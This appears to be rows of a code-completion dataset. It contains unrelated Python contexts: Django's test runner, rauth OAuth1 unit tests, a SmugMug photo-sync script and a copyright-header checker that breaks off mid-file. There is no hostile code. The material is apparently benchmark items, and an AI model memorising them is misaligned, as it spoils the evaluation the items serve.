gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
import sys
import signal
from django.conf import settings
from django.db.models import get_app, get_apps
from django.test import _doctest as doctest
from django.test.utils import setup_test_environment, teardown_test_environment
from django.test.testcases import OutputChecker, DocTestRunner, TestCase
from django.utils import unittest
# The module name for tests outside models.py
TEST_MODULE = 'tests'

# Shared doctest output checker used by build_suite()/build_test() below.
doctestOutputChecker = OutputChecker()
class DjangoTestRunner(unittest.TextTestRunner):
    """Text test runner that adds fail-fast support and graceful Ctrl-C
    handling on top of unittest.TextTestRunner."""

    def __init__(self, verbosity=0, failfast=False, **kwargs):
        super(DjangoTestRunner, self).__init__(verbosity=verbosity, **kwargs)
        # When True, the run stops after the first failed/errored test.
        self.failfast = failfast
        # Set by the SIGINT handler; checked after each test finishes.
        self._keyboard_interrupt_intercepted = False

    def run(self, *args, **kwargs):
        """
        Runs the test suite after registering a custom signal handler
        that triggers a graceful exit when Ctrl-C is pressed.
        """
        self._default_keyboard_interrupt_handler = signal.signal(signal.SIGINT,
            self._keyboard_interrupt_handler)
        try:
            result = super(DjangoTestRunner, self).run(*args, **kwargs)
        finally:
            # Always restore the previous SIGINT handler, even if the
            # suite raised.
            signal.signal(signal.SIGINT, self._default_keyboard_interrupt_handler)
        return result

    def _keyboard_interrupt_handler(self, signal_number, stack_frame):
        """
        Handles Ctrl-C by setting a flag that will stop the test run when
        the currently running test completes.
        """
        self._keyboard_interrupt_intercepted = True
        sys.stderr.write(" <Test run halted by Ctrl-C> ")
        # Set the interrupt handler back to the default handler, so that
        # another Ctrl-C press will trigger immediate exit.
        signal.signal(signal.SIGINT, self._default_keyboard_interrupt_handler)

    def _makeResult(self):
        # Wrap the result's stopTest() so the run can be stopped between
        # tests when failfast triggers or Ctrl-C was pressed.
        result = super(DjangoTestRunner, self)._makeResult()
        failfast = self.failfast

        def stoptest_override(func):
            def stoptest(test):
                # If we were set to failfast and the unit test failed,
                # or if the user has typed Ctrl-C, report and quit
                if (failfast and not result.wasSuccessful()) or \
                    self._keyboard_interrupt_intercepted:
                    result.stop()
                func(test)
            return stoptest

        setattr(result, 'stopTest', stoptest_override(result.stopTest))
        return result
def get_tests(app_module):
    """Import and return the app's companion 'tests' module, or None.

    If the 'tests' module exists but itself fails to import, the original
    ImportError is re-raised rather than silently returning None.
    """
    try:
        app_path = app_module.__name__.split('.')[:-1]
        test_module = __import__('.'.join(app_path + [TEST_MODULE]), {}, {}, TEST_MODULE)
    except ImportError, e:
        # Couldn't import tests.py. Was it due to a missing file, or
        # due to an import error in a tests.py that actually exists?
        import os.path
        from imp import find_module
        try:
            mod = find_module(TEST_MODULE, [os.path.dirname(app_module.__file__)])
        except ImportError:
            # 'tests' module doesn't exist. Move on.
            test_module = None
        else:
            # The module exists, so there must be an import error in the
            # test module itself. We don't need the module; so if the
            # module was a single file module (i.e., tests.py), close the file
            # handle returned by find_module. Otherwise, the test module
            # is a directory, and there is nothing to close.
            if mod[0]:
                mod[0].close()
            raise
    return test_module
def build_suite(app_module):
    "Create a complete Django test suite for the provided application module"
    suite = unittest.TestSuite()

    # Load unit and doctests in the models.py module. If module has
    # a suite() method, use it. Otherwise build the test suite ourselves.
    if hasattr(app_module, 'suite'):
        suite.addTest(app_module.suite())
    else:
        suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(app_module))
        try:
            suite.addTest(doctest.DocTestSuite(app_module,
                                               checker=doctestOutputChecker,
                                               runner=DocTestRunner))
        except ValueError:
            # No doc tests in models.py
            pass

    # Check to see if a separate 'tests' module exists parallel to the
    # models module
    test_module = get_tests(app_module)
    if test_module:
        # Load unit and doctests in the tests.py module. If module has
        # a suite() method, use it. Otherwise build the test suite ourselves.
        if hasattr(test_module, 'suite'):
            suite.addTest(test_module.suite())
        else:
            suite.addTest(unittest.defaultTestLoader.loadTestsFromModule(test_module))
            try:
                suite.addTest(doctest.DocTestSuite(test_module,
                                                   checker=doctestOutputChecker,
                                                   runner=DocTestRunner))
            except ValueError:
                # No doc tests in tests.py
                pass
    return suite
def build_test(label):
    """Construct a test case with the specified label. Label should be of the
    form model.TestClass or model.TestClass.test_method. Returns an
    instantiated test or test suite corresponding to the label provided.
    """
    parts = label.split('.')
    if len(parts) < 2 or len(parts) > 3:
        raise ValueError("Test label '%s' should be of the form app.TestCase or app.TestCase.test_method" % label)

    #
    # First, look for TestCase instances with a name that matches
    #
    app_module = get_app(parts[0])
    test_module = get_tests(app_module)
    TestClass = getattr(app_module, parts[1], None)

    # Couldn't find the test class in models.py; look in tests.py
    if TestClass is None:
        if test_module:
            TestClass = getattr(test_module, parts[1], None)

    try:
        # issubclass() raises TypeError when TestClass is None or not a
        # class; the outer except treats that as "not a TestCase" and
        # falls through to the doctest search below.
        if issubclass(TestClass, unittest.TestCase):
            if len(parts) == 2: # label is app.TestClass
                try:
                    return unittest.TestLoader().loadTestsFromTestCase(TestClass)
                except TypeError:
                    raise ValueError("Test label '%s' does not refer to a test class" % label)
            else: # label is app.TestClass.test_method
                return TestClass(parts[2])
    except TypeError:
        # TestClass isn't a TestClass - it must be a method or normal class
        pass

    #
    # If there isn't a TestCase, look for a doctest that matches
    #
    tests = []
    for module in app_module, test_module:
        try:
            doctests = doctest.DocTestSuite(module,
                                            checker=doctestOutputChecker,
                                            runner=DocTestRunner)
            # Now iterate over the suite, looking for doctests whose name
            # matches the pattern that was given
            for test in doctests:
                if test._dt_test.name in (
                        '%s.%s' % (module.__name__, '.'.join(parts[1:])),
                        '%s.__test__.%s' % (module.__name__, '.'.join(parts[1:]))):
                    tests.append(test)
        except ValueError:
            # No doctests found.
            pass

    # If no tests were found, then we were given a bad test label.
    if not tests:
        raise ValueError("Test label '%s' does not refer to a test" % label)

    # Construct a suite out of the tests that matched.
    return unittest.TestSuite(tests)
def partition_suite(suite, classes, bins):
    """
    Partitions a test suite by test type.

    ``classes`` is a sequence of types; ``bins`` is a sequence of
    TestSuites, one longer than ``classes``.  Tests of type
    ``classes[i]`` are added to ``bins[i]``; tests matching none of the
    classes end up in ``bins[-1]``.  Nested suites are flattened
    recursively.
    """
    for item in suite:
        if isinstance(item, unittest.TestSuite):
            # Recurse into nested suites rather than binning them whole.
            partition_suite(item, classes, bins)
            continue
        for cls, target in zip(classes, bins):
            if isinstance(item, cls):
                target.addTest(item)
                break
        else:
            # No class matched: place the test in the catch-all bin.
            bins[-1].addTest(item)
def reorder_suite(suite, classes):
    """
    Reorders a test suite by test type.

    Tests of type ``classes[0]`` are placed first, then tests of type
    ``classes[1]``, and so on.  Tests matching none of the given classes
    are placed last.
    """
    # One bin per class plus a trailing catch-all bin.
    bins = [unittest.TestSuite() for _ in range(len(classes) + 1)]
    partition_suite(suite, classes, bins)
    reordered = bins[0]
    for extra in bins[1:]:
        reordered.addTests(extra)
    return reordered
class DjangoTestSuiteRunner(object):
    """Orchestrates a full test run: environment setup, suite construction,
    test-database creation, execution, and teardown."""

    def __init__(self, verbosity=1, interactive=True, failfast=False, **kwargs):
        # failfast previously defaulted to True here, which was inconsistent
        # with both DjangoTestRunner (failfast=False) and the deprecated
        # run_tests() wrapper in this module (failfast=False); False is the
        # intended default.
        self.verbosity = verbosity
        self.interactive = interactive
        self.failfast = failfast

    def setup_test_environment(self, **kwargs):
        """Prepare the global test environment and force DEBUG off."""
        setup_test_environment()
        settings.DEBUG = False

    def build_suite(self, test_labels, extra_tests=None, **kwargs):
        """Build a suite from the given labels (or every installed app when
        no labels are given), plus any extra_tests."""
        suite = unittest.TestSuite()
        if test_labels:
            for label in test_labels:
                if '.' in label:
                    # 'app.TestClass[.test_method]' style label.
                    suite.addTest(build_test(label))
                else:
                    # Bare app label: run the app's entire suite.
                    app = get_app(label)
                    suite.addTest(build_suite(app))
        else:
            for app in get_apps():
                suite.addTest(build_suite(app))
        if extra_tests:
            for test in extra_tests:
                suite.addTest(test)
        # Run unittest-style TestCases before doctests and other tests.
        return reorder_suite(suite, (TestCase,))

    def setup_databases(self, **kwargs):
        """Create the test databases (or redirect TEST_MIRROR aliases).

        Returns the (old_names, mirrors) pair that teardown_databases()
        needs to undo this setup.
        """
        from django.db import connections
        old_names = []
        mirrors = []
        for alias in connections:
            connection = connections[alias]
            # If the database is a test mirror, redirect its connection
            # instead of creating a test database.
            if connection.settings_dict['TEST_MIRROR']:
                mirrors.append((alias, connection))
                mirror_alias = connection.settings_dict['TEST_MIRROR']
                connections._connections[alias] = connections[mirror_alias]
            else:
                old_names.append((connection, connection.settings_dict['NAME']))
                connection.creation.create_test_db(self.verbosity, autoclobber=not self.interactive)
        return old_names, mirrors

    def run_suite(self, suite, **kwargs):
        """Run the suite with DjangoTestRunner and return the result."""
        return DjangoTestRunner(verbosity=self.verbosity, failfast=self.failfast).run(suite)

    def teardown_databases(self, old_config, **kwargs):
        """Undo setup_databases(): restore mirrored aliases and destroy the
        test databases that were created."""
        from django.db import connections
        old_names, mirrors = old_config
        # Point all the mirrors back to the originals
        for alias, connection in mirrors:
            connections._connections[alias] = connection
        # Destroy all the non-mirror databases
        for connection, old_name in old_names:
            connection.creation.destroy_test_db(old_name, self.verbosity)

    def teardown_test_environment(self, **kwargs):
        """Restore the global environment changed by setup_test_environment()."""
        teardown_test_environment()

    def suite_result(self, suite, result, **kwargs):
        """Reduce a result object to the number of failed + errored tests."""
        return len(result.failures) + len(result.errors)

    def run_tests(self, test_labels, extra_tests=None, **kwargs):
        """
        Run the unit tests for all the test labels in the provided list.
        Labels must be of the form:
        - app.TestClass.test_method
          Run a single specific test method
        - app.TestClass
          Run all the test methods in a given class
        - app
          Search for doctests and unittests in the named application.
        When looking for tests, the test runner will look in the models and
        tests modules for the application.
        A list of 'extra' tests may also be provided; these tests
        will be added to the test suite.
        Returns the number of tests that failed.
        """
        self.setup_test_environment()
        suite = self.build_suite(test_labels, extra_tests)
        old_config = self.setup_databases()
        result = self.run_suite(suite)
        self.teardown_databases(old_config)
        self.teardown_test_environment()
        return self.suite_result(suite, result)
def run_tests(test_labels, verbosity=1, interactive=True, failfast=False, extra_tests=None):
    """Deprecated functional entry point; delegates to DjangoTestSuiteRunner."""
    import warnings
    warnings.warn(
        'The run_tests() test runner has been deprecated in favor of DjangoTestSuiteRunner.',
        PendingDeprecationWarning
    )
    runner = DjangoTestSuiteRunner(
        verbosity=verbosity, interactive=interactive, failfast=failfast)
    return runner.run_tests(test_labels, extra_tests=extra_tests)
|
|
# -*- coding: utf-8 -*-
'''
rauth.test_service_oauth1
-------------------------
Test suite for rauth.service.OAuth1Service.
'''
from base import RauthTestCase
from test_service import HttpMixin, RequestMixin, ServiceMixin
from rauth.compat import parse_qsl, quote, is_basestring, iteritems
from rauth.service import OAuth1Service
from rauth.session import OAUTH1_DEFAULT_TIMEOUT, OAuth1Session
from rauth.utils import CaseInsensitiveDict, ENTITY_METHODS, FORM_URLENCODED
from copy import deepcopy
from hashlib import sha1
from mock import patch
import rauth
import requests
import json
import pickle
class OAuth1ServiceTestCase(RauthTestCase, RequestMixin, ServiceMixin,
                            HttpMixin):
    """Tests for rauth.service.OAuth1Service with all HTTP traffic mocked.

    fake_request() replaces the session's request method so every test
    both exercises the code path and verifies the exact arguments that
    would have been sent over the wire.
    """

    # Static OAuth 1.0 credentials shared by every test.
    consumer_key = '000'
    consumer_secret = '111'
    access_token = '123'
    access_token_secret = '456'

    def setUp(self):
        RauthTestCase.setUp(self)

        self.request_token_url = 'http://example.com/request'
        self.access_token_url = 'http://example.com/access'
        self.authorize_url = 'http://example.com/authorize'
        self.base_url = 'http://example.com/api/'

        self.service = OAuth1Service(self.consumer_key,
                                     self.consumer_secret,
                                     name='service',
                                     request_token_url=self.request_token_url,
                                     access_token_url=self.access_token_url,
                                     authorize_url=self.authorize_url,
                                     base_url=self.base_url)
        self.session = self.service.get_session(('123', '456'))

        # patches
        self.session.request = self.fake_request
        self.service.get_session = self.fake_get_session

    def fake_get_auth_header(self, oauth_params, realm=None):
        # Build the Authorization header string expected for the given
        # oauth params, mirroring rauth's own header construction.
        auth_header = 'OAuth realm="{realm}"'.format(realm=realm)
        params = ''
        for k, v in iteritems(oauth_params):
            params += ',{key}="{value}"'.format(key=k, value=quote(str(v)))
        auth_header += params
        return auth_header

    # Decorators are applied bottom-up, so the injected mock arguments
    # arrive in the order: mock_request, mock_random, mock_time, mock_sig.
    @patch.object(rauth.session.HmacSha1Signature, 'sign')
    @patch.object(rauth.session, 'time')
    @patch.object(rauth.session, 'random')
    @patch.object(requests.Session, 'request')
    def fake_request(self,
                     method,
                     url,
                     mock_request,
                     mock_random,
                     mock_time,
                     mock_sig,
                     header_auth=False,
                     realm='',
                     **kwargs):
        # Pin randomness, time and the signature so the expected OAuth
        # parameters are fully deterministic.
        fake_random = 1
        fake_time = 1
        fake_sig = 'foo'
        fake_sig_meth = 'HMAC-SHA1'
        fake_nonce = sha1(str(fake_random).encode('ascii')).hexdigest()

        mock_request.return_value = self.response
        mock_random.return_value = fake_random
        mock_time.return_value = fake_time
        mock_sig.return_value = fake_sig

        method = method
        url = self.session._set_url(url)

        # Use a fresh, unpatched service/session so the real request
        # pipeline runs against the mocked requests.Session.request.
        service = OAuth1Service(self.consumer_key,
                                self.consumer_secret,
                                name='service',
                                request_token_url=self.request_token_url,
                                access_token_url=self.access_token_url,
                                authorize_url=self.authorize_url,
                                base_url=self.base_url)
        session = service.get_session((self.access_token,
                                       self.access_token_secret))
        r = session.request(method,
                            url,
                            header_auth=header_auth,
                            realm=realm,
                            **deepcopy(kwargs))

        # Reconstruct the kwargs rauth should have forwarded, then verify
        # them against the actual mock call below.
        kwargs.setdefault('headers', {})
        kwargs['headers'] = CaseInsensitiveDict(kwargs['headers'])

        entity_method = method.upper() in ENTITY_METHODS
        if entity_method:
            kwargs['headers'].setdefault('Content-Type', FORM_URLENCODED)

        form_urlencoded = \
            kwargs['headers'].get('Content-Type') == FORM_URLENCODED

        # Bodyless string params/data are parsed into dicts by rauth.
        if is_basestring(kwargs.get('params')):
            kwargs['params'] = dict(parse_qsl(kwargs['params']))

        if is_basestring(kwargs.get('data')) and form_urlencoded:
            kwargs['data'] = dict(parse_qsl(kwargs['data']))

        oauth_params = {'oauth_consumer_key': session.consumer_key,
                        'oauth_nonce': fake_nonce,
                        'oauth_signature_method': fake_sig_meth,
                        'oauth_timestamp': fake_time,
                        'oauth_token': self.access_token,
                        'oauth_version': session.VERSION,
                        'oauth_signature': fake_sig}

        if header_auth:
            # OAuth params travel in the Authorization header.
            auth = mock_request.call_args[1]['auth']
            auth_header = self.fake_get_auth_header(oauth_params, realm=realm)

            self.assertEqual(auth(requests.Request()).headers['Authorization'],
                             auth_header)

            kwargs['auth'] = auth
        elif entity_method:
            # OAuth params travel in the form-encoded body (or the query
            # string when the body is not form-encoded).
            kwargs['data'] = kwargs.get('data') or {}

            if form_urlencoded:
                kwargs['data'].update(oauth_params)
            else:
                kwargs.setdefault('params', {})
                kwargs['params'].update(oauth_params)
        else:
            # GET-style request: OAuth params travel in the query string.
            kwargs.setdefault('params', {})
            kwargs['params'].update(**oauth_params)

        mock_request.assert_called_with(method,
                                        url,
                                        timeout=OAUTH1_DEFAULT_TIMEOUT,
                                        **kwargs)
        return r

    def fake_get_session(self, token=None, signature=None):
        # Always hand back the already-patched session from setUp().
        return self.session

    def test_get_session(self):
        s = self.service.get_session()
        self.assertIsInstance(s, OAuth1Session)

    def test_get_raw_request_token(self):
        resp = 'oauth_token=foo&oauth_token_secret=bar'
        self.response.content = resp
        r = self.service.get_raw_request_token()
        self.assertEqual(r.content, resp)

    def test_get_raw_request_token_missing_request_token_url(self):
        self.service.request_token_url = None
        resp = 'oauth_token=foo&oauth_token_secret=bar'
        self.response.content = resp
        with self.assertRaises(TypeError) as e:
            self.service.get_raw_request_token()
        self.assertEqual(str(e.exception),
                         'request_token_url must not be None')

    def test_get_request_token(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        self.assertEqual(request_token, 'foo')
        self.assertEqual(request_token_secret, 'bar')

    def test_get_request_token_with_json_decoder(self):
        self.response.content = json.dumps({'oauth_token': 'foo',
                                            'oauth_token_secret': 'bar'})
        request_token, request_token_secret = \
            self.service.get_request_token(decoder=json.loads)
        self.assertEqual(request_token, 'foo')
        self.assertEqual(request_token_secret, 'bar')

    def test_get_authorize_url(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        url = self.service.get_authorize_url(request_token)
        expected_fmt = 'http://example.com/authorize?oauth_token={0}'
        self.assertEqual(url, expected_fmt.format(request_token))

    def test_get_authorize_url_with_url_encoded_characters(self):
        # Already-encoded tokens must not be double-encoded in the URL.
        token = 'uDV8XWNLSJjzMUSVfbG1gYHWMjY%3D'
        token_secret = 'e%2Bt9QCndiw1%2BtJbhy5UYVMAPTPo%3D'
        response_fmt = 'oauth_token={0}&oauth_token_secret={1}'
        self.response.content = response_fmt.format(token, token_secret)
        request_token, request_token_secret = self.service.get_request_token()
        url = self.service.get_authorize_url(request_token)
        expected_fmt = 'http://example.com/authorize?oauth_token={0}'
        self.assertEqual(url, expected_fmt.format(token))

    def test_get_raw_access_token(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        resp = 'oauth_token=foo&oauth_token_secret=bar'
        self.response.content = resp
        r = self.service.get_raw_access_token(request_token,
                                              request_token_secret)
        self.assertEqual(r.content, resp)

    def test_get_raw_access_token_missing_access_token_url(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        self.service.access_token_url = None
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        with self.assertRaises(TypeError) as e:
            self.service.get_raw_access_token(request_token,
                                              request_token_secret)
        self.assertEqual(str(e.exception),
                         'access_token_url must not be None')

    def test_get_access_token(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        access_token, access_token_secret = \
            self.service.get_access_token(request_token,
                                          request_token_secret)
        self.assertEqual(access_token, 'foo')
        self.assertEqual(access_token_secret, 'bar')

    def test_get_access_token_with_json_decoder(self):
        self.response.content = 'oauth_token=foo&oauth_token_secret=bar'
        request_token, request_token_secret = self.service.get_request_token()
        self.response.content = json.dumps({'oauth_token': 'foo',
                                            'oauth_token_secret': 'bar'})
        access_token, access_token_secret = \
            self.service.get_access_token(request_token,
                                          request_token_secret,
                                          decoder=json.loads)
        self.assertEqual(access_token, 'foo')
        self.assertEqual(access_token_secret, 'bar')

    def test_request_with_optional_params_oauth_callback(self):
        params = {'oauth_callback': 'http://example.com/callback'}
        r = self.session.request('GET', 'http://example.com/', params=params)
        self.assert_ok(r)

    def test_request_with_optional_params_oauth_verifier(self):
        params = {'oauth_verifier': 'foo'}
        r = self.session.request('GET', 'http://example.com/', params=params)
        self.assert_ok(r)

    def test_request_with_optional_params_oauth_version(self):
        params = {'oauth_verifier': 'foo'}
        r = self.session.request('GET', 'http://example.com/', params=params)
        self.assert_ok(r)

    def test_request_with_optional_params_as_string(self):
        params = 'oauth_callback=http://example.com/callback'
        r = self.session.request('GET', 'http://example.com/', params=params)
        self.assert_ok(r)

    def test_request_with_optional_data_as_string(self):
        data = 'oauth_callback=http://example.com/callback'
        r = self.session.request('POST', 'http://example.com/', data=data)
        self.assert_ok(r)

    def test_request_with_optional_params_with_data(self):
        data = {'oauth_callback': 'http://example.com/callback'}
        r = self.session.request('POST', 'http://example.com/', data=data)
        self.assert_ok(r)

    def test_request_with_header_auth(self):
        r = self.session.request('GET',
                                 'http://example.com/',
                                 header_auth=True)
        self.assert_ok(r)

    def test_request_with_header_auth_with_realm(self):
        r = self.session.request('GET',
                                 'http://example.com/',
                                 header_auth=True,
                                 realm='http://example.com/foo/')
        self.assert_ok(r)

    def test_get_auth_session(self):
        resp = 'oauth_token=foo&oauth_token_secret=bar'
        self.response.content = resp
        s = self.service.get_auth_session('foo', 'bar')
        self.assertIsInstance(s, OAuth1Session)

    def test_get_auth_session_with_request_token_response(self):
        resp = 'oauth_token=foo&oauth_token_secret=bar'
        self.response.content = resp
        self.service.request_token_response = 'ok'
        s = self.service.get_auth_session('foo', 'bar')
        self.assertEqual(s.request_token_response, 'ok')

    def test_pickle_session(self):
        session = pickle.loads(pickle.dumps(self.session))

        # Add the fake request back to the session
        session.request = self.fake_request
        r = session.request('GET', 'http://example.com/', header_auth=True)
        self.assert_ok(r)
|
|
import filesystem
import smugmug
import connectorbase
import json
from PIL import Image, ExifTags
import time
from clint.textui import progress
from file import File
import file as fileConstants
import os
import shutil
import traceback
import ConfigParser
from file import FileEncoder
import pprint
def match_sets(file_array):
    """Group files into sets of mutually matching files.

    Returns a list of lists; each inner list holds files that match one
    another according to do_files_match(). A None input yields [].
    """
    if file_array is None:
        return []
    result_sets = []
    remaining = list(file_array)
    while remaining:
        # Take the first file and collect everything that matches it.
        candidate = remaining[0]
        matched = match(candidate, remaining[1:])
        matched.append(candidate)
        result_sets.append(matched)
        # Remove the whole matched set before the next pass.
        for entry in matched:
            remaining.remove(entry)
    return result_sets
def match(file, files):
    """Return the subset of ``files`` that match ``file`` (see do_files_match)."""
    if files is None:
        return []
    return [candidate for candidate in files if do_files_match(file, candidate)]
def do_files_match(file1, file2):
    """Heuristically decide whether two file records refer to the same photo.

    A match requires identical names, then either: identical non-None sizes
    with matching md5s, or near-identical sizes (<=5% apart) with matching
    EXIF dimensions. Returns a falsy value otherwise.
    """
    if file1 is None or file2 is None:
        return False
    if file1.name == file2.name:
        # if sizes match, this is a match
        if file1.size == file2.size and file1.size is not None:
            # Filesystem files compute their md5 on demand; smugmug-side
            # records carry it as an attribute.
            md51 = None
            if file1.file_type == fileConstants.TYPE_FILESYSTEM:
                md51 = file1.get_filesystem_md5()
            else:
                md51 = file1.md5
            md52 = None
            if file2.file_type == fileConstants.TYPE_FILESYSTEM:
                md52 = file2.get_filesystem_md5()
            else:
                md52 = file2.md5
            if md51 is not None and md51 == md52:
                return True
        # if sizes are close, check exif data
        size_diff = abs(file1.size - file2.size) / float(file2.size)
        if size_diff > 0.05:
            return False
        # check height/width, camera model
        if file1.exif_height is None or file1.exif_width is None:
            return False
        sizes_match = file1.exif_height == file2.exif_height and file1.exif_width == file2.exif_width
        if not sizes_match:
            # Also accept rotated images (height/width swapped).
            sizes_match = file1.exif_height == file2.exif_width and file1.exif_width == file2.exif_height
        if sizes_match:
            #if file1.exif_camera == file2.exif_camera and file1.exif_camera is not None:
            # NOTE(review): the EXIF-date comparison is computed but its
            # positive result is deliberately disabled ('pass #return True'),
            # so fuzzy EXIF-based matches never succeed.
            if file1.exif_date_parsed is not None and file1.exif_date_parsed == file2.exif_date_parsed:
                pass #return True
    return False
def mirror(smc, smugmug, fs_folder, fs_file):
# Make sure the destination path exists
path = smugmug.relativePath
if path is None:
print 'Error: no relative path for file: ' + file.originalPath
return
path = path.lstrip('\\')
path = os.path.normpath(os.path.join(fs_folder, path))
dst = os.path.join(path, smugmug.name)
# Check if file is already there, skip it if it is.
if os.path.isfile(dst):
return
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
# If we have a fs file, copy from there, if not, fetch from smugmug.
if fs_file:
src = fs_file.originalPath
shutil.copy2(src, dst)
else:
smc.download(smugmug, dst)
def main():
    """Enumerate local and SmugMug files, match them up, and mirror the
    SmugMug side into the configured local destination."""
    start = time.clock()
    # dest_path falls back to 'e:\' when smugsync.cfg doesn't override it.
    config = ConfigParser.SafeConfigParser({'dest_path': 'e:\\'})
    config.read("smugsync.cfg")
    dest_path = config.get('smugsync', 'dest_path')
    fs = filesystem.FileSystemConnector( { connectorbase.ROOT_KEY: dest_path } )
    fs_files = fs.enumerate_objects()
    end_fs = time.clock()
    print 'Finished FS, time elapsed: %f' % (end_fs - start)
    start = time.clock()
    # API credentials are optional on disk; missing/broken keys file means
    # an empty config for the connector.
    config_data = {}
    try:
        with open('smugmug.keys', 'r') as keys_file:
            config_data = json.load(keys_file)
    except Exception as e:
        pass
    smc = smugmug.SmugMugConnector(config_data)
    smc.authenticate()
    sm_files = smc.enumerate_objects()
    end_sm = time.clock()
    print 'Finished SM, time elapsed: %f' % (end_sm - start)
    print '\r\n'
    print '\r\n'
    #for f in files:
    #    print json.dumps(f, indent = 2)
    # Count entries on each side (both structures map key -> list of files).
    sm_count = 0
    fs_count = 0
    for sm_k in sm_files:
        sm_count += len(sm_files[sm_k])
    for fs_k in fs_files:
        fs_count += len(fs_files[fs_k])
    print 'SM total: %d FS total: %d' % (sm_count, fs_count)
    print 'Starting file matching'
    start = time.clock()
    both =[]
    sm = []
    fs = []
    fuzzy = 0
    # Merge the two maps into one key -> [files from both sides] map;
    # keys consumed here are popped from sm_files so the leftover
    # smugmug-only keys can be appended afterwards.
    combined_files = {}
    for fs_file_key in fs_files:
        try:
            # combine all the files into a single list
            files_array = []
            fs_file_array = fs_files[fs_file_key]
            if fs_file_array is not None:
                files_array += fs_file_array
            sm_file_array = []
            if fs_file_key in sm_files:
                sm_file_array = sm_files[fs_file_key]
                sm_files.pop(fs_file_key)
            if sm_file_array is not None:
                files_array += sm_file_array
            combined_files[fs_file_key] = files_array
        except Exception as e:
            print 'Exception on ' + fs_file_key + ' :: ' + e.message
    for sm_file_key in sm_files:
        combined_files[sm_file_key] = sm_files[sm_file_key]
    #csv = open('files.csv', 'w')
    # Classify each matched set: present on both sides, smugmug-only
    # (mirrored by download), or filesystem-only.
    for file_key in progress.bar(combined_files):
        files_array = combined_files[file_key]
        matched_sets = match_sets(files_array)
        all_both = True
        for set in matched_sets:
            has_sm = False
            has_fs = False
            sm_file = None
            fs_file = None
            for f in set:
                # Keep the first representative found on each side.
                if f.file_type == fileConstants.TYPE_SMUGMUG:
                    sm_file = sm_file if not sm_file is None else f
                    has_sm = True
                if f.file_type == fileConstants.TYPE_FILESYSTEM:
                    fs_file = fs_file if not fs_file is None else f
                    has_fs = True
            if has_sm and has_fs:
                both.append(set)
                mirror(smc, sm_file, dest_path, fs_file)
            elif has_sm:
                sm.append(set)
                mirror(smc, sm_file, dest_path, None)
                all_both = False
            else:
                fs.append(set)
                all_both = False
        #if not all_both:
        #    for set in matched_sets:
        #        csv.write(file_key)
        #        csv.write(',')
        #        for csv_file in set:
        #            csv.write('%s,%d,' % (csv_file.originalPath, csv_file.size))
        #        csv.write('\r\n')
    #csv.close()
    print 'Done: %f sec' % (time.clock()-start)
    print 'Both: %d SM: %d FS: %d fuzzy: %d' % (len(both), len(sm), len(fs), fuzzy)
    # Mirror smugmug to local path
    # If we can find a matched pair, we have an md5sum identical file we can use.
# Mirror smugmug to local path
# If we can find a matched pair, we have an md5sum identical file we can use.
if __name__ == "__main__":
    # Script entry point: run the sync and dump any failure with traceback.
    try:
        main()
    except Exception as e:
        # NOTE(review): e.message is Python 2 only (removed in Python 3).
        print 'Exception: ' + e.message
        tb = traceback.format_exc()
        print tb
|
|
#!/usr/bin/env python3
# Copyright (c) 2016-2019 The Bitcoin Core developers
# Copyright (c) 2015-2018 The PIVX developers
# Copyright (c) 2018-2019 The Ion developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import re
import fnmatch
import sys
import subprocess
import datetime
import os
################################################################################
# file filtering
################################################################################
# Files that should never be checked, even if they match INCLUDE.
EXCLUDE = [
    # libsecp256k1:
    'src/secp256k1/include/secp256k1.h',
    'src/secp256k1/include/secp256k1_ecdh.h',
    'src/secp256k1/include/secp256k1_recovery.h',
    'src/secp256k1/include/secp256k1_schnorr.h',
    'src/secp256k1/src/java/org_bitcoin_NativeSecp256k1.c',
    'src/secp256k1/src/java/org_bitcoin_NativeSecp256k1.h',
    'src/secp256k1/src/java/org_bitcoin_Secp256k1Context.c',
    'src/secp256k1/src/java/org_bitcoin_Secp256k1Context.h',
    # univalue:
    'src/univalue/test/object.cpp',
    'src/univalue/lib/univalue_escapes.h',
    # auto generated:
    'src/qt/ioncoinstrings.cpp',
    'src/chainparamsseeds.h',
    # other external copyrights:
    'src/tinyformat.h',
    'src/leveldb/util/env_win.cc',
    'src/crypto/ctaes/bench.c',
    'test/functional/test_framework/bignum.py',
    # python init:
    '*__init__.py',
]
EXCLUDE_COMPILED = re.compile(
    '|'.join(fnmatch.translate(pattern) for pattern in EXCLUDE))

# Source-file extensions the check applies to.
INCLUDE = ['*.h', '*.cpp', '*.cc', '*.c', '*.py']
INCLUDE_COMPILED = re.compile(
    '|'.join(fnmatch.translate(pattern) for pattern in INCLUDE))

def applies_to_file(filename):
    """True when *filename* should be examined (included and not excluded)."""
    if EXCLUDE_COMPILED.match(filename) is not None:
        return False
    return INCLUDE_COMPILED.match(filename) is not None
################################################################################
# obtain list of files in repo according to INCLUDE and EXCLUDE
################################################################################
# Command used to enumerate all files tracked by git.
GIT_LS_CMD = 'git ls-files'

def call_git_ls():
    """Return the list of tracked file paths reported by `git ls-files`."""
    out = subprocess.check_output(GIT_LS_CMD.split(' '))
    # Drop the trailing empty entry produced by the final newline.
    return [f for f in out.decode("utf-8").split('\n') if f != '']
def get_filenames_to_examine():
    """Sorted list of tracked filenames that pass the include/exclude filters."""
    return sorted(name for name in call_git_ls() if applies_to_file(name))
################################################################################
# define and compile regexes for the patterns we are looking for
################################################################################
# A copyright line may or may not include the "(c)" marker.  Raw strings are
# used for the regex fragments containing backslashes; the values are
# unchanged, but this avoids Python's invalid-escape-sequence warnings.
COPYRIGHT_WITH_C = r'Copyright \(c\)'
COPYRIGHT_WITHOUT_C = 'Copyright'
